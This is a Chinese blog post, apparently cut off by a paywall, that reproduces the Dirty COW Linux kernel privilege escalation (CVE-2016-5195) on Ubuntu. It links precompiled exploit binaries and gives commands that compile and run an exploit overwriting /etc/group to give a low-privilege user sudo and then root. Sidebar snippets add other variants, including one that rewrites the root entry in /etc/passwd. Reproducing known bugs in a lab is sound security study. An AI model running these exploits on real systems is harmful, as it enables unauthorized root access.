DirtyCow(脏牛)漏洞复现

最新推荐文章于 2024-02-21 18:04:41 发布
VIP文章 最新推荐文章于 2024-02-21 18:04:41 发布
阅读量2.7w 收藏 31
点赞数 6
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wanzt123/article/details/81879680
版权

该文章首发于: 90sec(九零) 文章链接: https://forum.90sec.com/t/topic/521

这几天发现90sec需要登录才能浏览文章,为了方便就把该文章也发在个人博客,并顺便把之前编译好的脏牛提权EXP也一块放出来。

编译好的EXP下载地址: https://github.com/Brucetg/DirtyCow-EXP

该漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞, 导致可以破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后,利用此漏洞获取 其他只读内存映射的写权限,进一步获取 root 权限。

1.Linux

Ubuntu 14.04 :

1)添加用户: 

sudo adduser test

输入两次密码后一直回车就行,查看当前用户的信息,终端输入 id,回车,可以看到当 前用户是有 sudo 权限的。

切换到刚刚新建的 test 用户,同样输入 id,查看 test 用户的信息,发现 test 用户没有 sudo 权限,

2)运行DirtyCow的exp进行提权:

git clone https://github.com/dirtycow/dirtycow.github.io

cd dirtycow.github.io

编译exp:

gcc dirtyc0w.c -o dirtycow lpthread

执行exp:

./dirtycow /etc/group “$(sed ‘/\(sudo*\)/ s/$/,test/’ /etc/group)”

新打开一个终端,切换到test,查看test用户信息,可以看到test用户已经拥有了sudo权限,执行sudo su ,输入test用户的密码后就可以切换到root权限,提权成功。

漏洞成因:

Linux写时拷贝技术(copy-on-write)

在Linux系统中,fork()会产生一个和父进程完全相同的子进程,但子进程在此后多会exec系统调用,出于效率考虑,Linux系统中引入了“写时复制”技术,也就是只有

最低0.47元/天 解锁文章
Brucetg
关注
  • 6
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 11
    评论
专栏目录
DirtyCow提权漏洞复现(CVE-2016-5195)1
08-08
DirtyCow提权漏洞复现(CVE-2016-5195)复现(By Jean)目录 1. 环境部署 2 2. 漏洞复现 2 3. 参考 3环境部署主机操作系统
android系统dirty cow(脏牛)漏洞的检查资料
03-22
压缩包中包含:测试脏牛漏洞的c程序源代码、编译后的执行文件(在android系统中运行的)、测试文档
[VulnHub靶机渗透] 常用的linux提权方法——脏牛提权 dirty.c
最新发布
人若无名,便可专心练剑
02-21 795
脏牛(Dirty COW)是一个 Linux 内核漏洞,其全名为 “Copy-On-Write”。该漏洞在 2016 年首次公开,并且被广泛用于 Linux 系统上的提权攻击。脏牛漏洞允许攻击者利用内核中对于 “Copy-On-Write” 内存管理的一个缺陷来获取 root 权限。
DirtyCow:适用于32位和64位的Dirtycow漏洞利用
04-29
脏牛 适用于32位和64位的Dirtycow漏洞利用 32位的用法示例 $ gcc dc32.c -o cowroot -pthread $ ./cowroot $ echo 0> / proc / sys / vm / dirty_writeback_centisecs 64位的用法示例 $ gcc dc64.c -o cowroot -pthread $ ./cowroot $ echo 0> / proc / sys / vm / dirty_writeback_centisecs
dirtycow提权漏洞原理图
03-10
自己画的关于脏牛漏洞提权的原理图,个人感觉比较清晰,适合小白理解用
dirtycow脏牛linux提权exp
03-25
dirtycow脏牛linux提权exp
脏牛(Dirty Cow)快速指南
weixin_34061555的博客
11-09 2471
什么是DirtyCow 脏牛(Dirty Cow)是Linux内核的一个提权漏洞,攻击者可以利用这个漏洞获取root权限。之所以叫Dirty Cow,因为这个漏洞利用了Linux的copy-on-write机制。脏牛的CVE编号是CVE-2016-5195。 怎么判断我的系统是不是受影响 脏牛的影响范围很大,几乎涵盖了主流的Linux发行版。要判断系统是...
一次脏牛(Dirty Cow)漏洞提权实验
weixin_44504022的博客
05-04 1万+
一次脏牛漏洞提权实验
Linux提权—脏牛漏洞(CVE-2016-5195)
热门推荐
谢公子的博客
07-25 2万+
目录 脏牛漏洞 exp1复现: exp2复现脏牛漏洞 脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) 简要分析:该漏洞具体...
提权与内网渗透
VictorZhang
08-25 3870
权限在不同的应用中有不同的分类,安全相关的大致分为以下几种 1.匿名访问权限 2.来宾权限 3.用户权限 4.管理员权限 5.系统权限 电脑常见的的权限分为用户权限和管理员权限 例如普通用户权限会有很多限制,例如无法执行某些程序以及服务 Window基础命令 query user # 查看用户登录情况 whoami # 查看当前用户权限 systeminfo # 查看当前系统版本与补丁信...
漏洞复现- - -CVE-2016-5195 Dirty Cow脏牛提权漏洞
weixin_67503304的博客
11-02 4503
本文主要讲解了脏牛漏洞的提全过程及其修复建议。
dirtycow
05-10
脏牛漏洞利用dirtycow漏洞的pokemon漏洞作为基础,并自动生成新的passwd行。 运行二进制文件时,系统将提示用户输入新密码。 然后将原始的/ etc / passwd文件备份到/tmp/passwd.bak,并用生成的行覆盖root帐户。 运行漏洞利用程序后,您应该可以使用新创建的用户登录。 要使用此漏洞利用,请根据您的需要修改用户值。 正在创建的默认用户是firefart 。 原始漏洞利用(dirtycow的ptrace_pokedata“ pokemon”方法): : 编译: gcc -pthread dirty.c -o dirty -lcrypt 然后执行以下操作来运行新创建的二进制文件: ./dirty 或者 ./dirty my-new-password 之后,您可以使用su firefart或ssh firefart@... 运行开
DirtyCow-EXP:编译好的脏牛漏洞(CVE-2016-5195)EXP
05-16
DirtyCow-EXP 编译好的脏牛漏洞(CVE-2016-5195)EXP,分为 Linux 平台 和 Android 平台。 漏洞详细复现过程请参考:
Dirtycow: dirty0w.c(脏牛漏洞
qq_40976667的博客
02-11 1062
/* ####################### dirtyc0w.c ####################### $ sudo -s # echo this is not a test > foo # chmod 0404 foo $ ls -lah foo -r-----r-- 1 root root 19 Oct 20 15:23 foo $ cat foo this is not a test $ gcc -pthread dirtyc0w.c -o dirtyc0w $ ./dirt
脏牛提权
温和的跳跃
01-25 442
本来我在研究docker逃逸的结果看到脏牛提权。那就研究这个吧。dirty crow ...... 都是内核那点事。。。。。
linux “大脏牛漏洞分析(CVE-2017-1000405)
whatday的专栏
10-16 5027
一、背景简介 脏牛漏洞(CVE-2016–5195)是公开后影响范围最广和最深的漏洞之一,这十年来的每一个Linux版本,包括Android、桌面版和服务器版都受到其影响。恶意攻击者通过该漏洞可以轻易地绕过常用的漏洞防御方法,对几百万的用户进行攻击。尽管已针对该漏洞进行了补丁修复,但国外安全公司Bindecy对该补丁和内容做出深入研究后发现,脏牛漏洞的修复补丁仍存在缺陷,由此产生了“大脏牛漏洞...
【CVE复现NO.00001】“脏牛漏洞CVE-2016-5195复现及简要分析
arttnba3的博客
04-16 3765
【CVE复现NO.00001】CVE-2016-5195复现及简要分析[github blog addr](https://arttnba3.cn/2021/04/08/NOTE-0X04-CVE-2016-5195/)0x00.一切开始之前一、写时复制机制(Copy-on-Write)basic COWmmap 与 COW二、缺页异常(page fault)分类①软性缺页异常(soft page fault)②硬性缺页异常(hard page fault)③无效缺页异常(invalid page faul
脏牛提权及交互shell
weixin_43047908的博客
07-03 2458
目录什么是脏牛漏洞?影响范围及危害漏洞复现环境搭建脏牛提权完全交互shell权限维持 什么是脏牛漏洞脏牛漏洞(CVE-2016–5195),又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞,在2016年10月18后才得以修复,因此影响范围很大。 漏洞具体是由于get_user_page内核函数在处理Copy-on-Write的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。修改su或者
脏牛漏洞(CVE-2016-5195)复现过程(详细完整版)
qq_40898302的博客
01-19 906
KaLi 攻击机Linux靶机 靶场实验目的:掌握漏洞利用的方法掌握脏牛漏洞的原理提高对内核安全性的认识。
Linux提权一脏牛漏洞(CVE-2016-5195)复现
07-28
你好!对于Linux提权的脏牛漏洞(CVE-2016-5195),我可以为你提供一些复现的步骤。请注意,这是一个严重的安全漏洞,仅用于测试和教育目的。 在开始之前,请确保你已经备份了你的系统和数据,因为这个过程可能会对系统造成损坏。 以下是复现脏牛漏洞的一般步骤: 1. 确认你的系统受到脏牛漏洞的影响。你可以使用以下命令检查: ```shell $ uname -r ``` 如果输出的内核版本在`3.0`到`4.7`之间(不包括两端),那么你的系统可能受到影响。 2. 下载并编译脏牛漏洞的测试程序,可以使用以下命令: ```shell $ git clone https://github.com/dirtycow/dirtycow.github.io $ cd dirtycow.github.io $ make ``` 3. 运行测试程序进行提权。请注意,这可能会对系统造成损坏,所以请谨慎操作。 ```shell $ ./test_dirtycow your_file_name ``` `your_file_name`是你想要修改的目标文件的路径。这个测试程序会尝试修改目标文件的权限,以实现提权效果。 4. 检查提权是否成功。你可以尝试运行一个需要超级用户权限的命令来验证。 ```shell $ sudo whoami ``` 如果输出结果为"root",那么你已经成功提权了。 请记住,在测试和复现漏洞时,务必遵守法律和道德准则。此外,确保你在合法的环境下进行测试,并获得了合适的授权。 希望这些步骤能帮助到你!如果你有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值